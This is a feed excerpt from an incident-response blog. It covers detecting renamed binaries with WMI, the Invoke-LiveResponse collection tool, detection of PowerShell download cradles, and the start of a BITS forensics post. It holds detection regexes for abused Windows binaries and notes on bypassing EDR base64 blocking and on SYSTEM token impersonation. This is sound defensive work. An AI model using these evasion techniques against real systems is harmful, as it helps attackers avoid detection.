&lt;p&gt;One of the limitations of leveraging WMI Eventing as an event source is events typically do not hold all the appropriate data for a mature detection use case. To enrich the detection, we require to query the Win32_Process class. There is a slight delay in obtaining process metadata so very short-lived processes (fraction of a second) may cause missed results. In my testing, these very short-lived commands like renamed cmd: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;cdm /c echo &amp;lt;string&amp;gt;&lt;/code&gt; failed to generate wmi data however a slight pause during a local ping recorded the event. For the use case of a download cradle, access shell or other interactive commands typically of interest I do not foresee an issue but please keep this limitation in mind.&lt;/p&gt;

&lt;p&gt;A second limitation is performance. Although not particularly resource intensive in my testing (no visible resource utilisation), in production there may be unexpected constraints. I have filtered my Process Events with this in mind but testing is recommended. I have also specifically kept the binary attribute matching use case very simple with a eye on performance. This may mean less fidelity in alerting, however the POC is fairly simple to modify and add capabilities.&lt;/p&gt;

&lt;p&gt;It is also worthy to note: in some environments there may be legitimate binary rename activity for some of the targeted Original Names. Some of the binaries listed may require some tweaking of the matching logic to match host environment detection tolerance.&lt;/p&gt;

&lt;p&gt;Finally management, WMI Event consumers are notoriously hard to manage. I have included a Powershell installation script with uninstall instructions to support Powershell 2.0 and above.
&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h1 id=&quot;final-thoughts&quot;&gt;Final Thoughts&lt;/h1&gt;
&lt;p&gt;This has been a fun short project working on an open source detection capability. I was pleasantly surprised when I discovered vbscript has the ability query PE attributes. I hope others may find it useful, feel free to reach out if you have any feedback, questions, or improvements.&lt;/p&gt;

&lt;p&gt;The POC template can be found here - &lt;a href=&quot;https://gist.github.com/mgreen27/80d2709c01ef795206670605c1073370&quot;&gt;WMIEvent-BinaryRename.ps1&lt;/a&gt;
&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h1 id=&quot;further-reading&quot;&gt;Further reading&lt;/h1&gt;
&lt;ol&gt;
  &lt;li&gt;Ballenthin,William. Graeber, Matt. Teodorescu Claudiu. &lt;a href=&quot;https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html&quot;&gt;Windows Management Instrumentation (WMI) Offense, Defense, and Forensics&lt;/a&gt;, 2015 &lt;br /&gt;&lt;/li&gt;
  &lt;li&gt;Green, Matthew. &lt;a href=&quot;https://mgreen27.github.io/posts/2017/04/03/Blue_Team_Hacks-WMI_Eventing.html&quot;&gt;Blue Team Hacks - WMI Eventing&lt;/a&gt;, 2017 &lt;br /&gt;&lt;/li&gt;
  &lt;li&gt;The MITRE Corporation. &lt;a href=&quot;https://attack.mitre.org/techniques/T1036/&quot;&gt;Technique: Masquerading - MITRE ATT&amp;amp;CK™&lt;/a&gt; &lt;br /&gt;&lt;/li&gt;
  &lt;li&gt;MSDN. &lt;a href=&quot;https://docs.microsoft.com/en-us/previous-versions/windows/desktop/krnlprov/win32-processstarttrace&quot;&gt;Win32_ProcessStartTrace class&lt;/a&gt; &lt;br /&gt;&lt;/li&gt;
  &lt;li&gt;MSDN. &lt;a href=&quot;https://docs.microsoft.com/en-us/windows/desktop/properties/props-system-originalfilename&quot;&gt;System.OriginalFileName&lt;/a&gt; &lt;br /&gt;&lt;/li&gt;
  &lt;li&gt;Parisi, Timothy. Pena, Evan. &lt;a href=&quot;https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html&quot;&gt;WMI vs. WMI: Monitoring for Malicious Activity&lt;/a&gt;, 2016 &lt;br /&gt;&lt;/li&gt;
&lt;/ol&gt;

</description>
        <pubDate>Sun, 12 May 2019 00:00:00 +0000</pubDate>
        <link>https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html</link>
        <guid isPermaLink="true">https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html</guid>
        
        <category>DFIR</category>
        
        <category>WMI</category>
        
        <category>EDR</category>
        
        <category>T1036</category>
        
        <category>&quot;Defence</category>
        
        <category>Evasion&quot;</category>
        
        
        <category>posts</category>
        
      </item>
    
      <item>
        <title>Live Response Script Builder</title>
        <description>&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2019-04-07-ILRScriptBuilder/00title.jpg&quot; width=&quot;500&quot; /&gt;&lt;br /&gt;&lt;/div&gt;

&lt;p&gt;In this post I thought I would share some practical new features implemented in a recent refactor of Invoke-LiveResponse. These features enable fast and modular generation of live response scripts compatible with legacy Powershell. Im going to walk through the background then some of the new features and script creation.&lt;/p&gt;

&lt;h1 id=&quot;background&quot;&gt;Background&lt;/h1&gt;
&lt;p&gt;Invoke-LiveResponse (I-LR) is a Powershell module I put together 18 months ago to enable raw disk collections over WinRM. Leveraging Powerforensics via a custom Powershell function it enabled collections of key forensic artefacts and stdout of script results typical for live response tasks. More information can be found at the wiki, from my previous post or the code.&lt;/p&gt;

&lt;p&gt;Unless your running a preinstalled agent based solution, an important component of live response is local execution. As WinRM is not going to be deployed in most environments a common usecase may be via system management tools, scripting or local USB based collection. Secondly, simple expandability and the ability to write new collection capabilities quickly is an important design factor. I-LR’s supportability on Powershell 2.0 and no additional requirements beyond base operating system makes it a good candidate for this task.&lt;/p&gt;

&lt;p&gt;With that in mind, im going to explain some of the features below and walk through how custom live response scripts can be generated.
&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h1 id=&quot;modular&quot;&gt;Modular&lt;/h1&gt;
&lt;p&gt;Invoke-LiveResponse leverages a new modular component for running collections. We still have the standard preconfigured collection options however a new “-custom” switch allows for dropping a scriptblock or multiple scriptblocks into the custom folder for ForensicCopy mode execution and script generation.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2019-04-07-ILRScriptBuilder/01CustomFolder.png&quot; /&gt;Scripts dropped into custom folder.&lt;/div&gt;

&lt;div style=&quot;text-align: center; font-size:70%&quot;&gt;&lt;img width=&quot;400&quot; src=&quot;/static/img/article_images/2019-04-07-ILRScriptBuilder/01CustomAll.png&quot; /&gt;&lt;br /&gt;Invoke-LiveResponse: -all -vss -custom with four custom collections.&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h4 id=&quot;copy-preparation-and-search&quot;&gt;Copy Preparation and Search&lt;/h4&gt;
&lt;p&gt;Under the hood, Invoke-LiveResponse now leverages a copy preparation function to simplify creating collection content. A function: Copy-LiveResponse checks for existence of items and builds a hash table of files and folders using Get-ChildItem. This enables generic glob searching on path and filtering using both Get-ChildItem or Powershell’s powerful “Where-Object” syntax. Depending on mode: Windows API via Copy-Item, or a raw copy via Invoke-ForensicCopy, copies files with fallback to the alternate method if failure.&lt;/p&gt;

&lt;p&gt;Availible switches are familiar to anyone who uses Powershell Get-ChildItem:&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%&quot;&gt;&lt;img width=&quot;600&quot; src=&quot;/static/img/article_images/2019-04-07-ILRScriptBuilder/02copyswitches.png&quot; /&gt;&lt;br /&gt;Copy-LiveResponse: configuration options.&lt;/div&gt;

&lt;div style=&quot;text-align: center; font-size:70%&quot;&gt;&lt;img width=&quot;650&quot; src=&quot;/static/img/article_images/2019-04-07-ILRScriptBuilder/02execution.png&quot; /&gt;&lt;br /&gt;Example collection: Evidence of Execution.&lt;/div&gt;

&lt;div style=&quot;text-align: center; font-size:70%&quot;&gt;&lt;img width=&quot;700&quot; src=&quot;/static/img/article_images/2019-04-07-ILRScriptBuilder/02forensicmode.png&quot; /&gt;&lt;br /&gt;Example raw collection: Event Logs.&lt;/div&gt;

&lt;p&gt;Its worthy to note: Copy-LiveResponse leverages the Windows API for search. For basic live response of known files this was decided as the best approach as speed is improved greatly. Permissions searching with this technique does not inhibit results as the script runs as SYSTEM and “Get- ChildItem -Force” typically has complete visibility of even protected files. For NTFS special files or raw disk based search, direct use of Invoke- ForensicCopy is required.
For reference, I have included an example below:&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%&quot;&gt;&lt;img width=&quot;650&quot; src=&quot;/static/img/article_images/2019-04-07-ILRScriptBuilder/02rawexample.png&quot; /&gt;&lt;br /&gt;Example collection: NTFS special files.&lt;/div&gt;

&lt;p&gt;WriteScriptBlock and LocalOut
WriteScriptBlock writes a .ps1 file containing the Invoke-LiveResponse scriptblock to the current working directory. This is useful for creating a script that will be manually run on a host without WinRM configured or troubleshooting development efforts.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%&quot;&gt;&lt;img width=&quot;500&quot; src=&quot;/static/img/article_images/2019-04-07-ILRScriptBuilder/03writescriptblock.png&quot; /&gt;&lt;br /&gt;Invoke-LiveResponse -writescriptblock switch writes script to working folder.&lt;/div&gt;

&lt;p&gt;Writescriptblock also writes a scriptblock to allow for local LiveResponse and Memory collection mode. For LiveResponse mode, additional scripts with desired standard-out can be placed into a Content folder in the same location as the script to run on execution. Simlilarly the “-Mem” switch will look for a WinPMem binary in the same folder path as the generated script.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%&quot;&gt;&lt;img width=&quot;400&quot; src=&quot;/static/img/article_images/2019-04-07-ILRScriptBuilder/03writescriptblock1.png&quot; /&gt;&lt;br /&gt;Invoke-LiveResponse -writescriptblock folder structure for local execution.&lt;/div&gt;

&lt;p&gt;Combined with “-LocalOut:$True” enables building a ps1 file to run from LiveResponse USB or tool with execution. The results and collected artefacts are copied to the path of the script on execution.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%&quot;&gt;&lt;img width=&quot;500&quot; src=&quot;/static/img/article_images/2019-04-07-ILRScriptBuilder/03writescriptblock2.png&quot; /&gt;&lt;br /&gt;Invoke-LiveResponse -writescriptblock -localout:$true for local out to script location on execution.&lt;/div&gt;

&lt;p&gt;Alternatively a localout or UNC path can be defined. Note: UNC path will map a drive to copy, specifying localout will only use preexisting mappings or write to local drives (which is potentially forensically destructive).
&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h4 id=&quot;volume-shadowcopy&quot;&gt;Volume ShadowCopy&lt;/h4&gt;
&lt;p&gt;The “-VSS” switch enables collection of Volume ShadowCopy Service artefacts for all selected collections. The feature invokes CreateSymbolicLink via PInvoke to minimise forensic footprint, mounting all available VSC then copying artefacts if available. A dedup feature will take a hash of the VSS item and compare it to hashable collected files, skipping if previously copied.
&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h4 id=&quot;nobase64&quot;&gt;NoBase64&lt;/h4&gt;
&lt;p&gt;For raw disk access I-LR will utilise reflection to load an embedded Powerforensics module to memory. In field, some EDR / Powershell prevention tools will block the conversion function from base64. The “-Nobase64” switch leverages a direct byte array and GzipStream to bypass this technique. It is worthy to note, the created script is slightly larger size than its base64 equivalent.
&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h4 id=&quot;psreflect&quot;&gt;PSReflect&lt;/h4&gt;
&lt;p&gt;One of the components I have started rolling into Invoke-LiveResponse is reflection via pinvoke and Matt Graeber’s &lt;a href=&quot;https://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/&quot;&gt;PSreflect template&lt;/a&gt;. Initial implementations have been mounting UNC destination, Volume Shadow Copy and SYSTEM elevation via token impersonation. The longer term plan is to eventually run a significant LiveResponse capability via reflection for both forensic collection and live response summary information for use cases Powershell doesn’t provide legacy capability.
&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h1 id=&quot;putting-it-all-together&quot;&gt;Putting it all together&lt;/h1&gt;
&lt;p&gt;After walking through the availible features, I thought I would walk through a script generation for a custom collection.&lt;/p&gt;

&lt;p&gt;For installation please &lt;a href=&quot;https://github.com/mgreen27/Invoke-LiveResponse/archive/master.zip&quot;&gt;download Invoke-LiveResponse&lt;/a&gt; and add to your Powershell profile. Detailed instructions can be found on the &lt;a href=&quot;https://github.com/mgreen27/Invoke-LiveResponse/wiki/Installation&quot;&gt;wiki&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;To import the module:&lt;br /&gt;
&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;PS&amp;gt; Import-Module Invoke-LiveResponse&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;To view help:&lt;br /&gt;
&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;PS&amp;gt; Get-Help Invoke-LiveResponse -detailed&lt;/code&gt;
 &lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h4 id=&quot;memory-and-custom-disk&quot;&gt;Memory and custom disk&lt;/h4&gt;
&lt;p&gt;In this usecase I will be collecting memory artefacts. I am interested in collecting a memory dump in addition to memory artefacts on the file system.&lt;/p&gt;

&lt;p&gt;For Memory dump simple use of the inbuilt “-Mem” switch after ensuring WinPMem is available. For the FileSystem memory artefacts, I need to create a custom collection scriptblock.
Firstly, I am interested in pagefile and swapfile collection targeting the root folder (line 6). I have chosen forensic mode as I know these files are typically locked and require special access to download.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%&quot;&gt;&lt;img width=&quot;500&quot; src=&quot;/static/img/article_images/2019-04-07-ILRScriptBuilder/06scriptblock.png&quot; /&gt;&lt;br /&gt;Custom Scrtipblock: sbMemoryDisk.ps1&lt;/div&gt;
&lt;p&gt;Secondly, I am interested in any *.dmp files on the filesystem (line 7). For this search I have also targeted the root folder but have also added the “-recurse” switch. This will enable the recursive search to find any dump files on the filesystem by filename. I will also use the “-VSS” switch to mount and search Volume ShadowCopy. It is worthy to note if your looking for a traditional forensic carve / pattern match this is not the method for you - this is a fairly intensive search and typically during a live response we would aim to be more targeted.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%&quot;&gt;&lt;img width=&quot;750&quot; src=&quot;/static/img/article_images/2019-04-07-ILRScriptBuilder/06setup.png&quot; /&gt;&lt;br /&gt;Custom Scrtipblock: add to custom folder and run Invoke-LiveResponse.&lt;/div&gt;

&lt;p&gt;Next, add the custom scriptblock into the Invoke-LiveResponse module folder, load and then execute Invoke-LiveResponse. The Command line is:
&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;PS&amp;gt; Invoke-LiveResponse -mem -custom -vss -WriteScriptblock -LocalOut:$True&lt;/code&gt;&lt;br /&gt;
This command will output the generated live response script, to which we need to add a copy of WinPMem to the root of the target location. In my case, this was a removable SSD drive mounted as E:.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%&quot;&gt;&lt;img width=&quot;600&quot; src=&quot;/static/img/article_images/2019-04-07-ILRScriptBuilder/06execution.png&quot; /&gt;&lt;br /&gt;Invoke-LiveResponse: Local Execution from USB.&lt;/div&gt;

&lt;p&gt;On script execution, memory is collected and several files are found on the filesystem. As seen in the screenshot below, several process dumps were located on my desktop, the VSS and recyclebin.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%&quot;&gt;&lt;img src=&quot;/static/img/article_images/2019-04-07-ILRScriptBuilder/06results.png&quot; /&gt;&lt;br /&gt;Memory Artefacts: Results&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h1 id=&quot;final-thoughts&quot;&gt;Final Thoughts&lt;/h1&gt;
&lt;p&gt;I have learnt a lot implementing some of these features in a tool that has been fairly handy to have available in the time I have been using it. There are many ways to run live response and collect data, Invoke-LiveResponse provides a solution with minimal requirements beyond what is available by default from Windows 7 and above. I hope others can get some value using it so please feel free to reach out and provide feedback and improvements.
&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

</description>
        <pubDate>Sun, 07 Apr 2019 00:00:00 +0000</pubDate>
        <link>https://mgreen27.github.io/posts/2019/04/07/ILRScriptBuilder.html</link>
        <guid isPermaLink="true">https://mgreen27.github.io/posts/2019/04/07/ILRScriptBuilder.html</guid>
        
        <category>DFIR</category>
        
        <category>Powershell</category>
        
        <category>&quot;Live</category>
        
        <category>Response&quot;</category>
        
        
        <category>posts</category>
        
      </item>
    
      <item>
        <title>Powershell Download Cradles</title>
        <description>&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-04-02-DownloadCradle/wolfandsheep2.png&quot; width=&quot;500&quot; /&gt;&lt;/div&gt;

&lt;p&gt;In this post I thought I would share some information on Powershell download cradles I put together recently. I’m going to provide an overview, highlighting areas I found interesting thinking about detection from both network and endpoint views.&lt;/p&gt;

&lt;p&gt;I have also included a link to a results summary and a noisemaker script I have been using to test. I focused on Powershell download cradles, or more specifically cradles that I could execute a Powershell payload. I have also not included all the .NET methods that seem to be effectively the same as Powershell WebClient. &lt;br /&gt;&lt;/p&gt;

&lt;h1 id=&quot;so-what-is-a-cradle-and-why-do-i-care&quot;&gt;So what is a cradle and why do I care?&lt;/h1&gt;
&lt;p&gt;A download cradle is a single line command for download and code execution. Typically seen at the end of a maldoc or exploit, implementing the second stage download of exploit/infection within the attack lifecycle. A download cradle can also be part of a persistence mechanism, tooling or execution at other attack stages when an attacker attempts to download capability or run fileless.&lt;/p&gt;

&lt;p&gt;From an evil standpoint - the best download cradles are proxy, credential and https aware so will slide right by a corporate firewall.
For defenders, obtaining visibility and focusing detection at a common attack chokepoint, we can minimize impact effectively.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2018-04-02-DownloadCradle/Powershell_CLI_ALL.png&quot; alt=&quot;There is a large menu of evil download cradles - a selection with un-obfuscated CommandLine&quot; /&gt;&lt;/p&gt;

&lt;h1 id=&quot;network-detection&quot;&gt;Network Detection&lt;/h1&gt;
&lt;p&gt;Network is usually the easiest point of visibility but can be noisy looking at unfiltered events. I have found interesting use cases baselining current activity then spotting deviations from normal filtering on User-Agent, content, http method, destination domain and URL.&lt;/p&gt;

&lt;p&gt;Understanding the traffic behavior for each cradle and whitelisting trusted components is a good start on building out detection.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2018-04-02-DownloadCradle/CradleSummary.jpg&quot; alt=&quot;Download Cradle summary table&quot; /&gt;&lt;/p&gt;

&lt;h1 id=&quot;endpoint-detection&quot;&gt;Endpoint Detection&lt;/h1&gt;
&lt;p&gt;Endpoint visibility enables the lions share of quality detection opportunities and bypasses network encryption limitations. I see several main visibility areas that highlight the benefit of modern endpoint capability in addition to network monitoring.&lt;/p&gt;

&lt;h3 id=&quot;process-image-chains&quot;&gt;Process Image Chains&lt;/h3&gt;
&lt;p&gt;One of the most well-known methods for spotting evil is parent / child process relationships. A shell, script interpreter or loader as a child to a commonly exploited program may indicate some type of evil leading to the use of a download cradle.&lt;br /&gt;
&lt;br /&gt;
Some examples:&lt;br /&gt;
&lt;small&gt;Parent: &lt;code&gt;(?i).*\\(winword|excel|powerpnt|mspub|visio|outlook)\.exe&lt;/code&gt;&lt;small&gt;&lt;/small&gt;&lt;br /&gt;
&lt;small&gt;Child: &lt;code&gt;(?i).*\\(cmd|powershell|cscript|wscript|wmic|regsvr32|schtasks|rundll32|mshta|hh)\.exe&lt;/code&gt;&lt;small&gt;&lt;/small&gt;&lt;br /&gt;&lt;/small&gt;&lt;/small&gt;&lt;/p&gt;

&lt;p&gt;Similarly WmiPrvSE, a shell or script interpreter as parent may indicate a process chain of &lt;br /&gt;cradle execution.&lt;br /&gt;
&lt;br /&gt;
Some examples:&lt;br /&gt;
&lt;small&gt;Parent: &lt;code&gt;(?i).*\\(mshta|powershell|cmd|rundll32|cscript|wscript|wmiprvse.exe)\.exe&lt;/code&gt;&lt;small&gt;&lt;/small&gt;&lt;br /&gt;
&lt;small&gt;Child: &lt;code&gt;(?i).*\\(cmd|powershell|schtasks|reg|nslookup|certutil|bitsadmin)\.exe&lt;/code&gt;&lt;small&gt;&lt;/small&gt;&lt;br /&gt;&lt;/small&gt;&lt;/small&gt;&lt;/p&gt;

&lt;p&gt;Some of these process relationships may be legitimate in a large environment so appropriate baselining is recommended. A mature blue team understands expected process image and chain mappings to spot deviation from normal. A mature team is also able to spot new and unusual process paths across multigenerational chains.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-04-02-DownloadCradle/Powershell_chain.png&quot; alt=&quot; Process chain from a cradle triggered by opening a maldoc&quot; width=&quot;500&quot; /&gt;&lt;/div&gt;

&lt;h3 id=&quot;command-line&quot;&gt;Command Line&lt;/h3&gt;
&lt;p&gt;Considering process command line makes the blue team’s job much easier by adding another whitelistable data point to the process chain stack.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2018-04-02-DownloadCradle/Powershell_CLI.png&quot; alt=&quot; DDE attack (top) and WMI based macro (bottom)&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Some of the gaps to this method as a standalone technique is command line obfuscation. Obfuscation is an extreamly large area and to give coverage justice, I have included a link in my references below to some excellent research by Daniel Bohannon (Invoke-CradleCrafter was a huge influence on some of the types of cradles I tested).&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-04-02-DownloadCradle/Powershell_CLI_03.png&quot; width=&quot;500&quot; alt=&quot;This download cradle was generated by Daniel Bohannon's excellent obfuscation toolsets.&quot; /&gt;&lt;/div&gt;

&lt;p&gt;From a defenders standpoint, obfuscation can defeat specific command line detection, however itself is an indicator. Understanding process chains and their command line enables defenders to whitelist known good and spot abnormalities.&amp;lt;/p&amp;gt;&lt;/p&gt;

&lt;p&gt;Its also worthy to note, depending on the obfuscation type - enabling latest Powershell version 5.x script block logging and Windows10 Anti-Malware Scan Interface equipped tools can assist detection of obfuscated Powershell payloads at runtime.&lt;/p&gt;

&lt;h3 id=&quot;module-loads&quot;&gt;Module loads&lt;/h3&gt;
&lt;p&gt;Module loads provide another unique visibility point vital for modern endpoint based detection. For an attacker living off the land it is impossible for a download cradle to operate without network based modules. Below you can see an example of Powershell loaded network modules during execution.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2018-04-02-DownloadCradle/Powershell_module.png&quot; alt=&quot; Powershell Webclient network module loads&quot; /&gt;
Some good examples I picked out of my dataset are:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Powershell.exe loading rasman.dll and rasapi32.dll (Powershell network methods)&lt;/li&gt;
  &lt;li&gt;Powershell.exe loading ieproxy.dll (Powershell IE COM methods)&lt;/li&gt;
  &lt;li&gt;Powershell.exe loading dnsapi.dll or winhttp.dll or wininet.dll (Common network modules)&lt;/li&gt;
  &lt;li&gt;Powershell.exe loading msxml3.dll (Powershell MsXml COM)&lt;/li&gt;
  &lt;li&gt;Powershell.exe loading qmgrprxy.dll or Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll (Powershell BITS)&lt;/li&gt;
  &lt;li&gt;Certutil.exe loading wininet.dll&lt;/li&gt;
  &lt;li&gt;regsvr32.exe loading scrobj.dll and wininet.dll (Squiblydoo)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Keep in mind, the list above is focused on Powershell cradles. I have seen downloaders implemented for COM objects from vbscript and other languages so it may be worth also considering module loads more heuristically - e.g common script interpreters. Module visibility is key.&lt;/p&gt;

&lt;h3 id=&quot;network-connections&quot;&gt;Network connections&lt;/h3&gt;
&lt;p&gt;Network connections from the endpoints view provides additional context to detect bad. A mature blue team can collect and baseline network connections by process and user context. In most environments, powershell.exe (and others) would be unexpected connecting to the internet on a standard user endpoint.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2018-04-02-DownloadCradle/Powershell_network.png&quot; alt=&quot;Network activity by process - importance of endpoint context&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;file-write-events&quot;&gt;File write events&lt;/h3&gt;
&lt;p&gt;Despite most Powershell download cradles in my list above being classed as memory resident, there are some that write payloads and artefacts. In the example below of particular interest in the Internet Explorer and Office COM object methods are the cached and *.url link files for downloaded file.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2018-04-02-DownloadCradle/Powershell_file.png&quot; alt=&quot;A selection of Powershell Office COM object file writes - url files are link files that will provide path and file downloaded&quot; /&gt;
Monitoring for unusual file writes by Powershell and certutil.exe are other simple techniques enabled by visibility that can be used to detect download cradle activity.&lt;/p&gt;

&lt;h3 id=&quot;registry&quot;&gt;Registry&lt;/h3&gt;
&lt;p&gt;Not all download cradles I looked at had specific registry IOCs that were worth monitoring. An exception is the existence of powershell_RASMANCS and powershell_RASAPI32 tracing keys that are evidence of Powershell network communication.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2018-04-02-DownloadCradle/Powershell_registry.png&quot; alt=&quot;Monitor for activity to HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS and HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;other-artefacts&quot;&gt;Other Artefacts&lt;/h3&gt;
&lt;p&gt;I would expect all modern EDR vendors to provide event visibility of the above artefacts as standard. However, in real world situations, agent coverage may be incomplete or we may be getting into the fight late for event telemetry.&lt;/p&gt;

&lt;p&gt;With that in mind, a component for download cradle detection is traditional forensic capability. Evidence of execution, registry, event logs or volatile data analysis spotting similar artefacts to the event data above is the obvious starting point. In the example below I have highlighted a prefetch entry with reference to the handle to some of the DLLs listed above.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2018-04-02-DownloadCradle/Powershell_prefetch.png&quot; alt=&quot;Evidence of Execution - Powershell Webclient method&quot; /&gt;
Microsoft BITS also has some specific forensic artefacts I have previously covered in another post that I have included in my references below.&lt;/p&gt;

&lt;h1 id=&quot;final-thoughts&quot;&gt;Final Thoughts&lt;/h1&gt;
&lt;p&gt;Network and endpoint visibility should be priority of all blue teams. Although focusing on a small section of the attack lifecycle, this post has been an overview of some of the areas I found interesting when thinking about download cradle detection. Understanding offensive technique and forensic artefacts enables blue teams to write high quality detections near the top the pyramid of pain. Correlating this data towards your own visibility levels, blue teams can work towards improvement and optimising resources for both detection and response.&lt;/p&gt;

&lt;p&gt;Let me know if you have any questions. I have added my &lt;a href=&quot;https://github.com/mgreen27/mgreen27.github.io/tree/master/static/other/DownloadCradle&quot;&gt;testing results and script here&lt;/a&gt;. I would be interested to hear results testing these out on different vendors.&lt;/p&gt;

&lt;h1 id=&quot;references&quot;&gt;References&lt;/h1&gt;
&lt;p&gt;1) Arno0x0x. &lt;a href=&quot;https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/&quot;&gt;Windows oneliners to download remote payload and execute arbitrary code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;2) Bohannon, Daniel. &lt;a href=&quot;https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf&quot;&gt;DOSfuscation whitepaper&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;3) Bohannon, Daniel. &lt;a href=&quot;https://github.com/danielbohannon/Invoke-Obfuscation&quot;&gt;Invoke-Obfuscation&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;4) Bohannon, Daniel. &lt;a href=&quot;http://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-cradlecrafter-overview&quot;&gt;The Invoke-CradleCrafter Overview&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;5) Bohannon, Daniel. Holmes, Lee. &lt;a href=&quot;https://github.com/danielbohannon/Revoke-Obfuscation&quot;&gt;Revoke-Obfuscation&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;6) HarmJ0y. &lt;a href=&quot;https://gist.github.com/HarmJ0y/bb48307ffa663256e239&quot;&gt;DownloadCradles.ps1&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;7) Have You Secured? &lt;a href=&quot;https://haveyousecured.blogspot.com.au/2017/07/taking-closer-look-at-powershell.html&quot;&gt;Taking a Closer Look at PowerShell Download Cradles&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;8) Green, Matthew. &lt;a href=&quot;https://mgreen27.github.io/posts/2018/02/18/Sharing_my_BITS.html&quot;&gt;Sharing my BITS&lt;/a&gt;&lt;/p&gt;

</description>
        <pubDate>Mon, 02 Apr 2018 00:00:00 +0000</pubDate>
        <link>https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html</link>
        <guid isPermaLink="true">https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html</guid>
        
        <category>DFIR</category>
        
        <category>Powershell</category>
        
        
        <category>posts</category>
        
      </item>
    
      <item>
        <title>Sharing my BITS</title>
        <description>&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2018-02-18-Sharing_My_BITS/00title.png&quot; width=&quot;700&quot; /&gt;&lt;/div&gt;

&lt;h2 id=&quot;sharing-my-bits&quot;&gt;Sharing my BITS&lt;/h2&gt;
&lt;p&gt;I thought I would share some research on Microsoft BITS after a recent tool released by the French ANSSI to parse BITS job artefacts. This tool has sparked my interest due to previous research on download cradles and an interest in the client side forensics. I’m going to give a brief background, talk about some nuances in collection types and provide some background information when I was thinking about detection.&lt;/p&gt;

&lt;h3 id=&quot;what-is-bits-and-why-do-we-care&quot;&gt;What is BITS and why do we care?&lt;/h3&gt;
&lt;p&gt;Background Intelligent Transfer Service (BITS) is a Windows component used to transfer files asynchronously between a client and a server. Part of all modern Windows systems from 2000+, the most well known use for BITS is Windows updates and other Windows transfer tasks.&lt;/p&gt;

&lt;p&gt;BITS has many interesting features including firewall whitelisted and proxy capable file transfer. BITS can also be configured on a schedule, with prioritisation or throttled transfer over idle network bandwidth. Additional “evil friendly” features are the ability to execute a command line option post job (persistence use case) and transfer policy. A newer feature is peer caching where subnet peer machines can be used as a cache for file downloads.&lt;/p&gt;

